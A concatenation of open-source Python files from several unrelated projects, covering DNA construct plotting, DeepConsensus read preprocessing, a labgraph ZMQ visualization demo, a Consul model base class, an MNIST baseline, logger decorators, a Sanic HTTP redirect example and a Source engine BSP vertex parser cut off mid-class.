t1_2 = {'type':'Terminator', 'name':'t0', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-1}}
gA_2 = {'type':'CDS', 'name':'gA', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['red'], 'edgecolor':col_map['red'], 'x_extent':24, 'label':'A', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':2, 'label_y_offset':-1}}
rbs_1_2 = {'type':'RBS', 'name':'rbs_f', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-6, 'x_extent':6}}
p1_2 = {'type':'Promoter', 'name':'pA', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black']}}
p2_2 = {'type':'Promoter', 'name':'pA', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black']}}
rbs_2_2 = {'type':'RBS', 'name':'rbs_r', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-6, 'x_extent':6}}
gB_2 = {'type':'CDS', 'name':'gB', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['blue'], 'edgecolor':col_map['blue'], 'x_extent':24, 'label':'B', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':-3, 'label_y_offset':-1}}
t2_2 = {'type':'Terminator', 'name':'t0', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-1}}
design2 = [t1_2, gA_2, rbs_1_2, p1_2, p2_2, rbs_2_2, gB_2, t2_2]
# Define design 3
p1_3 = {'type':'Promoter', 'name':'pA', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black']}}
rbs_1_3 = {'type':'RBS', 'name':'rbs_r', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-6, 'x_extent':6}}
gA_3 = {'type':'CDS', 'name':'gB', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['red'], 'edgecolor':col_map['red'], 'x_extent':24, 'label':'A', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':-3, 'label_y_offset':-1}}
t1_3 = {'type':'Terminator', 'name':'t0', 'fwd':True, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-1}}
t2_3 = {'type':'Terminator', 'name':'t0', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-1}}
gB_3 = {'type':'CDS', 'name':'gA', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['blue'], 'edgecolor':col_map['blue'], 'x_extent':24, 'label':'B', 'label_style':'italic', 'label_color':(1,1,1), 'label_x_offset':0, 'label_y_offset':-1}}
rbs_2_3 = {'type':'RBS', 'name':'rbs_f', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black'], 'start_pad':-6, 'x_extent':6}}
p2_3 = {'type':'Promoter', 'name':'pA', 'fwd':False, 'opts':{'linewidth':lw, 'color':col_map['black']}}
design3 = [p1_3, rbs_1_3, gA_3, t1_3, t2_3, gB_3, rbs_2_3, p2_3]
# Set up the axes for the genetic constructs
ax_dna1 = plt.axes([0.35, 0.83, 0.35, 0.12])
ax_dna2 = plt.axes([0.61, 0.65, 0.4, 0.12])
ax_dna3 = plt.axes([0.58, 0.32, 0.4, 0.12])
# Create the DNAplotlib renderer
dr = dpl.DNARenderer()
# Redender the DNA to axis
start, end = dr.renderDNA(ax_dna1, design1, dr.SBOL_part_renderers())
ax_dna1.set_xlim([start, end])
ax_dna1.set_ylim([-15,15])
ax_dna1.set_aspect('equal')
ax_dna1.set_xticks([])
ax_dna1.set_yticks([])
ax_dna1.axis('off')
start, end = dr.renderDNA(ax_dna2, design2, dr.SBOL_part_renderers())
ax_dna2.set_xlim([start, end])
ax_dna2.set_ylim([-15,15])
ax_dna2.set_aspect('equal')
ax_dna2.set_xticks([])
ax_dna2.set_yticks([])
ax_dna2.axis('off')
start, end = dr.renderDNA(ax_dna3, design3, dr.SBOL_part_renderers())
ax_dna3.set_xlim([start, end])
ax_dna3.set_ylim([-15,15])
ax_dna3.set_aspect('equal')
ax_dna3.set_xticks([])
ax_dna3.set_yticks([])
ax_dna3.axis('off')
# Sort out subplot spacing
plt.subplots_adjust(hspace=0.01, left=0.13, right=0.95, top=0.93, bottom=0.13)
# Save the figure
fig.savefig('scatter_annotate.pdf', transparent=True)
fig.savefig('scatter_annotate.png', dpi=300)
# Clear the plotting cache
plt.close('all')
|
deepconsensus/preprocess/preprocess.py | pichuan/deepconsensus | 106 | 12635376 | <filename>deepconsensus/preprocess/preprocess.py
# Copyright (c) 2021, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of Google Inc. nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
r"""Performs preprocessing of subread-aligned data.
Usage:
deepconsensus preprocess \
--subreads_to_ccs=subreads_to_ccs.bam \
--ccs_fasta=ccs_fasta.fasta \
--truth_bed=truth_bed.bed \
--truth_to_ccs=truth_to_ccs.bam \
--truth_split=truth_split.tsv \
[email protected] \
--cpus=4
"""
import collections
import functools
import json
import multiprocessing
import multiprocessing.pool
import os
import time
from typing import Dict, List
from absl import flags
from absl import logging
import tensorflow as tf
from deepconsensus.preprocess import utils
from deepconsensus.utils import dc_constants
from absl import app
AsyncResult = multiprocessing.pool.AsyncResult
Queue = multiprocessing.Queue
Issue = dc_constants.Issue
FLAGS = flags.FLAGS
flags.DEFINE_string('subreads_to_ccs', None,
'Input BAM containing subreads aligned to ccs.')
flags.DEFINE_string('ccs_fasta', None, 'Input FASTA containing ccs sequences.')
flags.DEFINE_string(
'output', None,
('Output filename. If training, use @split wildcard for split name. '
'For example: [email protected]'
'The output filename must end in .tfrecord.gz'))
flags.DEFINE_string('truth_to_ccs', None, 'Input truth bam aligned to ccs.')
flags.DEFINE_string('truth_bed', None, 'Input truth bedfile.')
# TODO TODO
flags.DEFINE_string('truth_split', None,
'Input file defining train/eval/test splits.')
flags.DEFINE_integer(
'cpus',
multiprocessing.cpu_count(),
'Number of worker processes to use. Use 0 to disable parallel processing. '
'Minimum of 2 CPUs required for parallel processing.',
short_name='j')
flags.DEFINE_integer('bam_reader_threads', 8,
'Number of decompression threads to use.')
flags.DEFINE_integer('limit', 0, 'Limit processing to n ZMWs.')
def register_required_flags():
flags.mark_flags_as_required([
'subreads_to_ccs',
'ccs_fasta',
'output',
])
def trace_exception(f):
"""Decorator to catch errors run in multiprocessing processes."""
@functools.wraps(f)
def wrap(*args, **kwargs):
try:
result = f(*args, **kwargs)
return result
except: # pylint: disable=bare-except
logging.exception('Error in function %s.', f.__name__)
raise Exception('Error in worker process')
return wrap
def make_dirs(path):
# Create directories for filename
tf.io.gfile.makedirs(os.path.dirname(path))
def setup_writers(output_fname: str,
splits: List[str]) -> Dict[str, tf.io.TFRecordWriter]:
"""Creates tf writers for split set."""
tf_writers = {}
tf_ops = tf.io.TFRecordOptions(compression_type='GZIP')
for split in splits:
split_fname = output_fname.replace('@split', split)
# Create subdirs if necessary.
make_dirs(split_fname)
tf_writers[split] = tf.io.TFRecordWriter(split_fname, tf_ops)
return tf_writers
def write_tf_record(tf_example_str_set: List[bytes], split: str,
tf_writers: Dict[str, tf.io.TFRecordWriter]):
"""Writes tf examples to a split."""
for tf_example_str in tf_example_str_set:
tf_writers[split].write(tf_example_str)
tf_writers[split].flush()
@trace_exception
def tf_record_writer(output_fname: str, splits: List[str],
queue: Queue) -> bool:
"""tf_record writing worker."""
tf_writers = setup_writers(output_fname, splits)
while True:
tf_example_str_set, split = queue.get()
if split == 'kill':
break
write_tf_record(tf_example_str_set, split, tf_writers)
for writer in tf_writers.values():
writer.close()
return True
@trace_exception
def process_subreads(subreads: List[utils.Read],
ccs_seqname: str,
dc_config: utils.DcConfig,
split: str,
queue: Queue,
local=False):
"""Subread processing worker."""
tf_out = []
dc_example = utils.subreads_to_dc_example(subreads, ccs_seqname, dc_config)
for example in dc_example.iter_examples():
tf_out.append(example.tf_example().SerializeToString())
dc_example.counter[f'n_examples_{split}'] += len(tf_out)
dc_example.counter['n_examples'] += len(tf_out)
if local:
return tf_out, split, dc_example.counter
else:
queue.put([tf_out, split])
# Return a counter object for each ZMW.
return dc_example.counter
def clear_tasks(tasks: List[AsyncResult],
main_counter: collections.Counter) -> List[AsyncResult]:
"""Clear successful tasks and log result."""
for task in tasks:
if task.ready():
if task.successful():
# Fetch task results and integrate into main counter
counter = task.get()[0]
main_counter.update(counter)
tasks.remove(task)
else:
raise Exception('A worker process failed.')
logging.info('Processed %s ZMWs.', main_counter['n_zmw_pass'])
return tasks
def main(unused_argv) -> None:
if FLAGS.cpus == 1:
raise ValueError('Must set cpus to 0 or >=2 for parallel processing.')
is_training = FLAGS.truth_to_ccs and FLAGS.truth_bed and FLAGS.truth_split
if not FLAGS.output.endswith('.tfrecord.gz'):
raise ValueError('--output must end with .tfrecord.gz')
if is_training:
logging.info('Generating tf.Examples in training mode.')
contig_split = utils.read_truth_split(FLAGS.truth_split)
splits = set(contig_split.values())
for split in splits:
if '@split' not in FLAGS.output:
raise ValueError('You must add @split to --output when training.')
elif FLAGS.truth_to_ccs or FLAGS.truth_bed or FLAGS.truth_split:
err_msg = ('You must specify truth_to_ccs, truth_bed, and truth_split '
'to generate a training dataset.')
raise Exception(err_msg)
else:
logging.info('Generating tf.Examples in inference mode.')
splits = ['inference']
manager = multiprocessing.Manager()
queue = manager.Queue()
dc_config = utils.DcConfig(max_passes=20, example_width=100, padding=20)
proc_feeder, main_counter = utils.create_proc_feeder(
subreads_to_ccs=FLAGS.subreads_to_ccs,
ccs_fasta=FLAGS.ccs_fasta,
dc_config=dc_config,
truth_bed=FLAGS.truth_bed,
truth_to_ccs=FLAGS.truth_to_ccs,
truth_split=FLAGS.truth_split,
limit=FLAGS.limit,
bam_reader_threads=FLAGS.bam_reader_threads)
if FLAGS.cpus == 0:
logging.info('Using a single cpu.')
tf_writers = setup_writers(FLAGS.output, splits)
for args in proc_feeder():
tf_example_str_set, split, counter = process_subreads(
*args, queue=None, local=True)
write_tf_record(tf_example_str_set, split, tf_writers)
# Update counter
main_counter.update(counter)
if main_counter['n_zmw_pass'] % 20 == 0:
logging.info('Processed %s ZMWs.', main_counter['n_zmw_pass'])
else:
logging.info('Processing in parallel using %s cores', FLAGS.cpus)
with multiprocessing.Pool(FLAGS.cpus) as pool:
# Setup parallelization
tf_writer = pool.apply_async(tf_record_writer,
(FLAGS.output, splits, queue))
tasks = []
for args in proc_feeder():
tasks.append(pool.starmap_async(process_subreads, ([*args, queue],)))
if main_counter['n_zmw_pass'] % 20 == 0:
tasks = clear_tasks(tasks, main_counter)
while tasks:
time.sleep(0.5)
tasks = clear_tasks(tasks, main_counter)
# Cleanup multiprocessing.
queue.put(['', 'kill'])
tf_writer.get()
manager.shutdown()
pool.close()
pool.join()
# Write summary
logging.info('Completed processing %s ZMWs.', main_counter['n_zmw_pass'])
summary_name = 'training' if is_training else 'inference'
dataset_summary = FLAGS.output.replace('.tfrecord.gz',
f'.{summary_name}.json')
# Remove @split from filenames
dataset_summary = dataset_summary.replace('@split', 'summary')
logging.info('Writing %s.', dataset_summary)
make_dirs(dataset_summary)
with open(dataset_summary, 'w') as summary_file:
summary = dict(main_counter.items())
summary.update(dc_config.to_dict())
flag_list = [
'subreads_to_ccs', 'ccs_fasta', 'truth_to_ccs', 'truth_bed',
'truth_split'
]
for flag in flag_list:
summary[flag] = FLAGS[flag].value
summary['version'] = dc_constants.__version__
json_summary = json.dumps(summary, indent=True)
summary_file.write(json_summary)
if __name__ == '__main__':
logging.use_python_logging()
app.run(main)
|
labgraph/examples/simple_viz_zmq.py | Yunusbcr/labgraph | 124 | 12635392 | <filename>labgraph/examples/simple_viz_zmq.py
#!/usr/bin/env python3
# Copyright 2004-present Facebook. All Rights Reserved.
# Built-in imports
import asyncio
from labgraph.zmq_node.zmq_message import ZMQMessage
from labgraph.zmq_node.zmq_poller_node import ZMQPollerConfig
import time
from dataclasses import field
from typing import Any, List, Optional, Tuple
# Import labgraph
import labgraph as lg
from labgraph.zmq_node import ZMQPollerNode
# Imports required for this example
import matplotlib.animation as animation
import matplotlib.axes
import matplotlib.pyplot as plt
import numpy as np
# Constants used by nodes
NUM_FEATURES = 100
WINDOW = 2.0
REFRESH_RATE = 2.0
ENDPOINT = "tcp://localhost:5555" # For ZMQ
TOPIC = "randomstream" # For ZMQ
# A data type used in streaming, see docs: Messages
class RandomMessage(lg.Message):
timestamp: float
data: np.ndarray
# ================================= ZMQ deserializer ==================================
# A shim to feed ZMQ data to the rolling averager
class ZMQDeserializer(lg.Node):
INPUT = lg.Topic(ZMQMessage)
OUTPUT = lg.Topic(RandomMessage)
# Take the raw data and reify it to a RandomMessage
@lg.subscriber(INPUT)
@lg.publisher(OUTPUT)
async def deserialize(self, message: ZMQMessage) -> lg.AsyncPublisher:
yield self.OUTPUT, RandomMessage(timestamp=time.time(), data=np.frombuffer(message.data))
# ================================= ROLLING AVERAGER ===================================
# The state of the RollingAverager node: holds windowed messages
class RollingState(lg.State):
messages: List[RandomMessage] = field(default_factory=list)
# Configuration for RollingAverager
class RollingConfig(lg.Config):
window: float # Window, in seconds, to average over
# A transformer node that accepts some data on an input topic and averages that data
# over the configured window to its output topic
class RollingAverager(lg.Node):
INPUT = lg.Topic(RandomMessage)
OUTPUT = lg.Topic(RandomMessage)
state: RollingState
config: RollingConfig
# A transformer method that transforms data from one topic into another
@lg.subscriber(INPUT)
@lg.publisher(OUTPUT)
async def average(self, message: RandomMessage) -> lg.AsyncPublisher:
current_time = time.time()
self.state.messages.append(message)
self.state.messages = [
message
for message in self.state.messages
if message.timestamp >= current_time - self.config.window
]
if len(self.state.messages) == 0:
return
all_data = np.stack([message.data for message in self.state.messages])
mean_data = np.mean(all_data, axis=0)
yield self.OUTPUT, RandomMessage(timestamp=current_time, data=mean_data)
# ================================== AVERAGED NOISE ====================================
# Configuration for AveragedNoise
class AveragedNoiseConfig(lg.Config):
num_features: int # Number of features to generate
window: float # Window, in seconds, to average over
read_addr: str
zmq_topic: str
poll_time: float
# A group that combines noise generation and rolling averaging. The output topic
# contains averaged noise. We could just put all three nodes in a graph below, but we
# add this group to demonstrate the grouping functionality.
class AveragedNoise(lg.Group):
OUTPUT = lg.Topic(RandomMessage)
config: AveragedNoiseConfig
ZMQ: ZMQPollerNode
ZMQ_DESERIALIZER: ZMQDeserializer
ROLLING_AVERAGER: RollingAverager
def connections(self) -> lg.Connections:
# To produce averaged noise, we connect the noise generator to the averager
# Then we "expose" the averager's output as an output of this group
return (
(self.ZMQ.topic, self.ZMQ_DESERIALIZER.INPUT),
(self.ZMQ_DESERIALIZER.OUTPUT, self.ROLLING_AVERAGER.INPUT),
(self.ROLLING_AVERAGER.OUTPUT, self.OUTPUT),
)
def setup(self) -> None:
# Cascade this group's configuration to its contained nodes
self.ZMQ.configure(
ZMQPollerConfig(
read_addr=self.config.read_addr,
zmq_topic=self.config.zmq_topic,
poll_time=self.config.poll_time
)
)
self.ROLLING_AVERAGER.configure(RollingConfig(window=self.config.window))
# ======================================= PLOT =========================================
# The state of the Plot: holds the most recent data received, which should be displayed
class PlotState(lg.State):
data: Optional[np.ndarray] = None
# The configuration for the Plot
class PlotConfig(lg.Config):
refresh_rate: float # How frequently to refresh the bar graph
num_bars: int # The number of bars to display (note this should be == num_features)
# A node that creates a matplotlib bar graph that displays the produced data in
# real-time
class Plot(lg.Node):
INPUT = lg.Topic(RandomMessage)
state: PlotState
config: PlotConfig
def setup(self) -> None:
self.ax: Optional[matplotlib.axes.Axes] = None
# A subscriber method that simply receives data and updates the node's state
@lg.subscriber(INPUT)
def got_message(self, message: RandomMessage) -> None:
self.state.data = message.data
# A main method does not interact with topics, but has its own line of execution -
# this can be useful for Python libraries that must be run in the main thread. For
# example, scikit-learn and pyqtgraph are libraries that need the main thread.
@lg.main
def run_plot(self) -> None:
fig = plt.figure()
self.ax = fig.add_subplot(1, 1, 1)
self.ax.set_ylim((0, 1))
anim = animation.FuncAnimation( # noqa: F841
fig, self._animate, interval=1 / self.config.refresh_rate * 1000
)
plt.show()
raise lg.NormalTermination()
def _animate(self, i: int) -> None:
if self.ax is None or self.state.data is None:
return
self.ax.clear()
self.ax.set_ylim([0, 1])
self.ax.bar(range(self.config.num_bars), self.state.data)
# ======================================= DEMO =========================================
# A graph for the demo in this example. Hooks together the AveragedNoise group
# (containing NoiseGenerator and RollingAverager) and the Plot node.
class Demo(lg.Graph):
AVERAGED_NOISE: AveragedNoise
PLOT: Plot
def setup(self) -> None:
# Provide configuration using global constants (but if we wanted to, we could
# have a configuration object provided to this graph as well).
self.AVERAGED_NOISE.configure(
AveragedNoiseConfig(
num_features=NUM_FEATURES, window=WINDOW,
read_addr=ENDPOINT, zmq_topic=TOPIC, poll_time=1.0
)
)
self.PLOT.configure(
PlotConfig(refresh_rate=REFRESH_RATE, num_bars=NUM_FEATURES)
)
# Connect the AveragedNoise output to the Plot input
def connections(self) -> lg.Connections:
return ((self.AVERAGED_NOISE.OUTPUT, self.PLOT.INPUT),)
# Parallelization: Run AveragedNoise and Plot in separate processes
def process_modules(self) -> Tuple[lg.Module, ...]:
return (self.AVERAGED_NOISE, self.PLOT)
# Entry point: run the Demo graph
# This demo does the same thing as simple_viz.py, but uses a zmq source (zmq_source.py) rather
# than a hardcoded source.
if __name__ == "__main__":
print("Initializing ZMQ demo - please run zmq_source.py in another terminal.")
lg.run(Demo)
|
consulate/models/base.py | Beahmer89/consulate | 309 | 12635396 | <gh_stars>100-1000
# coding=utf-8
"""
Base Model
"""
import collections
class Model(collections.Iterable):
"""A model contains an __attribute__ map that defines the name,
its type for type validation, an optional validation method, a method
used to
.. python::
class MyModel(Model):
__attributes__ = {
'ID': {
'type': uuid.UUID,
'required': False,
'default': None,
'cast_from': str,
'cast_to': str
},
'Serial': {
'type': int
'required': True,
'default': 0,
'validator': lambda v: v >= 0 end,
}
}
"""
__attributes__ = {}
"""The attributes that define the data elements of the model"""
def __init__(self, **kwargs):
super(Model, self).__init__()
[setattr(self, name, value) for name, value in kwargs.items()]
[self._set_default(name) for name in self.__attributes__.keys()
if name not in kwargs.keys()]
def __iter__(self):
"""Iterate through the model's key, value pairs.
:rtype: iterator
"""
for name in self.__attributes__.keys():
value = self._maybe_cast_value(name)
if value is not None:
yield self._maybe_return_key(name), value
def __setattr__(self, name, value):
"""Set the value for an attribute of the model, validating the
attribute name and its type if the type is defined in ``__types__``.
:param str name: The attribute name
:param mixed value: The value to set
:raises: AttributeError
:raises: TypeError
:raises: ValueError
"""
if name not in self.__attributes__:
raise AttributeError('Invalid attribute "{}"'.format(name))
value = self._validate_value(name, value)
super(Model, self).__setattr__(name, value)
def __getattribute__(self, name):
"""Return the attribute from the model if it is set, otherwise
returning the default if one is set.
:param str name: The attribute name
:rtype: mixed
"""
try:
return super(Model, self).__getattribute__(name)
except AttributeError:
if name in self.__attributes__:
return self.__attributes__[name].get('default', None)
raise
def _maybe_cast_value(self, name):
"""Return the attribute value, possibly cast to a different type if
the ``cast_to`` item is set in the attribute definition.
:param str name: The attribute name
:rtype: mixed
"""
value = getattr(self, name)
if value is not None and self.__attributes__[name].get('cast_to'):
return self.__attributes__[name]['cast_to'](value)
return value
def _maybe_return_key(self, name):
"""Return the attribute name as specified in it's ``key`` definition,
if specified. This is to map python attribute names to their Consul
alternatives.
:param str name: The attribute name
:rtype: mixed
"""
if self.__attributes__[name].get('key'):
return self.__attributes__[name]['key']
return name
def _required_attr(self, name):
"""Returns :data:`True` if the attribute is required.
:param str name: The attribute name
:rtype: bool
"""
return self.__attributes__[name].get('required', False)
def _set_default(self, name):
"""Set the default value for the attribute name.
:param str name: The attribute name
"""
setattr(self, name, self.__attributes__[name].get('default', None))
def _validate_value(self, name, value):
"""Ensures the the value validates based upon the type or a validation
function, raising an error if it does not.
:param str name: The attribute name
:param mixed value: The value that is being set
:rtype: mixed
:raises: TypeError
:raises: ValueError
"""
if value is None:
if self._required_attr(name):
raise ValueError('Attribute "{}" is required'.format(name))
return
if not isinstance(value, self.__attributes__[name].get('type')):
cast_from = self.__attributes__[name].get('cast_from')
if cast_from and isinstance(value, cast_from):
value = self.__attributes__[name]['type'](value)
else:
raise TypeError(
'Attribute "{}" must be of type {} not {}'.format(
name, self.__attributes__[name]['type'].__name__,
value.__class__.__name__))
if self.__attributes__[name].get('enum') \
and value not in self.__attributes__[name]['enum']:
raise ValueError(
'Attribute "{}" value {!r} not valid'.format(name, value))
validator = self.__attributes__[name].get('validator')
if callable(validator):
if not validator(value, self):
raise ValueError(
'Attribute "{}" value {!r} did not validate'.format(
name, value))
return value
|
examples/batch_normalization/mnist_baseline.py | uaca/deepy | 260 | 12635407 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This experiment setting is described in http://arxiv.org/pdf/1502.03167v3.pdf.
MNIST MLP baseline model.
Gaussian initialization described in the paper did not convergence, I have no idea.
"""
import logging, os
logging.basicConfig(level=logging.INFO)
from deepy.dataset import MnistDataset, MiniBatches
from deepy.networks import NeuralClassifier
from deepy.layers import Dense, Softmax
from deepy.trainers import SGDTrainer
default_model = os.path.join(os.path.dirname(__file__), "models", "baseline1.gz")
if __name__ == '__main__':
model = NeuralClassifier(input_dim=28 * 28)
model.stack(Dense(100, 'sigmoid'),
Dense(100, 'sigmoid'),
Dense(100, 'sigmoid'),
Dense(10, 'linear'),
Softmax())
trainer = SGDTrainer(model)
batches = MiniBatches(MnistDataset(), batch_size=60)
trainer.run(batches, epoch_controllers=[])
model.save_params(default_model) |
src/super_gradients/common/decorators/deci_logger.py | Deci-AI/super-gradients | 308 | 12635422 | <filename>src/super_gradients/common/decorators/deci_logger.py
def deci_func_logger(_func=None, *, name: str = 'abstract_decorator'):
"""
This decorator is used to wrap our functions with logs.
It will log every enter and exit of the functon with the equivalent parameters as extras.
It will also log exceptions that raises in the function.
It will also log the exception time of the function.
How it works:`
First it will check if the decorator called with name keyword.
If so it will return a new decorator that its logger is the name parameter.
If not it will return a new decorator that its logger is the wrapped function name.
Then the return decorator will return a new function that warps the original function with the new logs.
For further understanding advise real-python "fancy decorators documentation"
Args:
_func (): used when called without name specify. dont pass it directly
name (): The name of the logger to save logs by.
Returns:
a decorator that wraps function with logs logic.
"""
# TODO: Not Working - Breaks the code, tests does not pass (s3 connector, platform...)
# TODO: Fix problem with ExplicitParamValidation error (arguments not passed)
# TODO: Run ALL test suite of deci2 (NOT circieCI test suite, but ALL the tests under tests folders)
# TODO: Delete/Update all failing tests.
# def deci_logger_decorator(fn):
#
# @functools.wraps(fn)
# def wrapper_func(*args, **kwargs):
# try:
#
# try:
# logger.debug(f"Start: {fn.__name__}", extra={"args": args, "kwargs": kwargs})
# time1 = time.perf_counter()
# except Exception:
# # failed to write log - continue.
# pass
#
# result = fn(*args, **kwargs)
#
# try:
# time2 = time.perf_counter()
# logger.debug(f"End: {fn.__name__}",
# extra={'duration': (time2 - time1) * 1000.0, 'return_value': result})
# except Exception:
# # failed to write log - continue.
# pass
#
# return result
#
# except Exception as ex:
# # This exception was raised from inside the function call
# logger.error(f"Exception: {ex}", exc_info=ex)
# raise ex
#
# return wrapper_func
# if _func is None:
# logger = get_logger(name)
# return deci_logger_decorator
# else:
# logger = get_logger(_func.__name__)
# return deci_logger_decorator(_func)
return _func
def deci_class_logger():
"""
This decorator wraps every class method with deci_func_logger decorator.
It works by checking if class method is callable and if so it will set a new decorated method as the same method name.
"""
def wrapper(cls):
# TODO: Not Working - Breaks the code, tests does not pass (s3 connector, platform...)
# TODO: Fix problem with ExplicitParamValidation error (arguments not passed)
# TODO: Run ALL test suite of deci2 (NOT circieCI test suite, but ALL the tests under tests folders)
# TODO: Delete/Update all failing tests.
# for attr in cls.__dict__:
# if callable(getattr(cls, attr)) and attr != '__init__':
# decorated_function = deci_func_logger(name=cls.__name__)(getattr(cls, attr))
# if type(cls.__dict__[attr]) is staticmethod:
# decorated_function = staticmethod(decorated_function)
# setattr(cls, attr, decorated_function)
return cls
return wrapper
|
examples/http_redirect.py | Varriount/sanic | 1,883 | 12635440 | from sanic import Sanic, response, text
from sanic.handlers import ErrorHandler
from sanic.server.async_server import AsyncioServer
HTTP_PORT = 9999
HTTPS_PORT = 8888
http = Sanic("http")
http.config.SERVER_NAME = f"localhost:{HTTP_PORT}"
https = Sanic("https")
https.config.SERVER_NAME = f"localhost:{HTTPS_PORT}"
@https.get("/foo")
def foo(request):
return text("foo")
@https.get("/bar")
def bar(request):
return text("bar")
@http.get("/<path:path>")
def proxy(request, path):
url = request.app.url_for(
"proxy",
path=path,
_server=https.config.SERVER_NAME,
_external=True,
_scheme="http",
)
return response.redirect(url)
@https.main_process_start
async def start(app, _):
http_server = await http.create_server(
port=HTTP_PORT, return_asyncio_server=True
)
app.add_task(runner(http, http_server))
app.ctx.http_server = http_server
app.ctx.http = http
@https.main_process_stop
async def stop(app, _):
await app.ctx.http_server.before_stop()
await app.ctx.http_server.close()
for connection in app.ctx.http_server.connections:
connection.close_if_idle()
await app.ctx.http_server.after_stop()
app.ctx.http = False
async def runner(app: Sanic, app_server: AsyncioServer):
app.is_running = True
try:
app.signalize()
app.finalize()
ErrorHandler.finalize(app.error_handler)
app_server.init = True
await app_server.before_start()
await app_server.after_start()
await app_server.serve_forever()
finally:
app.is_running = False
app.is_stopping = True
https.run(port=HTTPS_PORT, debug=True)
|
library/source1/bsp/lumps/vertex_lump.py | BlenderAddonsArchive/SourceIO | 199 | 12635527 | import numpy as np
from .. import Lump, lump_tag
@lump_tag(3, 'LUMP_VERTICES')
class VertexLump(Lump):
def __init__(self, bsp, lump_id):
super().__init__(bsp, lump_id)
self.vertices = np.array([])
def parse(self):
reader = self.reader
self.vertices = np.frombuffer(reader.read(), np.float32)
self.vertices = self.vertices.reshape((-1, 3))
return self
@lump_tag(0x47, 'LUMP_UNLITVERTEX', bsp_version=29)
class UnLitVertexLump(Lump):
_dtype = np.dtype(
[
('vpi', np.uint32, (1,)),
('vni', np.uint32, (1,)),
('uv', np.float32, (2,)),
('unk', np.int32, (1,)),
]
)
def __init__(self, bsp, lump_id):
super().__init__(bsp, lump_id)
self.vertex_info = np.array([])
def parse(self):
reader = self.reader
self.vertex_info = np.frombuffer(reader.read(), self._dtype)
return self
@lump_tag(0x49, 'LUMP_BUMPLITVERTEX', bsp_version=29)
class BumpLitVertexLump(Lump):
_dtype = np.dtype(
[
('vpi', np.uint32, (1,)),
('vni', np.uint32, (1,)),
('uv', np.float32, (2,)),
('unk1', np.int32, (1,)),
('uv_lm', np.float32, (2,)),
('uv1', np.float32, (2,)),
('unk2', np.uint32, (2,)),
]
)
def __init__(self, bsp, lump_id):
super().__init__(bsp, lump_id)
self.vertex_info = np.array([])
def parse(self):
reader = self.reader
self.vertex_info = np.frombuffer(reader.read(), self._dtype)
return self
@lump_tag(0x4a, 'LUMP_UNLITTSVERTEX', bsp_version=29)
class UnlitTSVertexLump(Lump):
_dtype = np.dtype(
[
('vpi', np.uint32, (3,)),
('vni', np.uint32, (1,)),
('uv', np.float32, (2,)),
]
)
def __init__(self, bsp, lump_id):
super().__init__(bsp, lump_id)
self.vertex_info = np.array([])
def parse(self):
reader = self.reader
self.vertex_info = np.frombuffer(reader.read(), self._dtype)
return self
@lump_tag(0x4B, 'LUMP_BLINNPHONGVERTEX', bsp_version=29)
class BlinnPhongVertexLump(Lump):
_dtype = np.dtype(
[
('vpi', np.uint32, (3,)),
('vni', np.uint32, (1,)),
('unk', np.uint32, (2,)),
]
)
def __init__(self, bsp, lump_id):
super().__init__(bsp, lump_id)
self.vertex_info = np.array([])
def parse(self):
reader = self.reader
self.vertex_info = np.frombuffer(reader.read(), self._dtype)
return self
@lump_tag(0x4C, 'LUMP_R5VERTEX', bsp_version=29)
class R5VertexLump(Lump):
_dtype = np.dtype(
[
('vpi', np.uint32, (3,)),
('vni', np.uint32, (1,)),
('unk', np.uint32, (2,)),
('uv', np.float32, (2,)),
('uv_lm', np.float32, (2,)),
]
)
def __init__(self, bsp, lump_id):
super().__init__(bsp, lump_id)
self.vertex_info = np.array([])
def parse(self):
reader = self.reader
self.vertex_info = np.frombuffer(reader.read(), self._dtype)
return self
@lump_tag(0x4E, 'LUMP_R7VERTEX', bsp_version=29)
class R7VertexLump(Lump):
_dtype = np.dtype(
[
('vpi', np.uint32, (3,)),
('vni', np.uint32, (1,)),
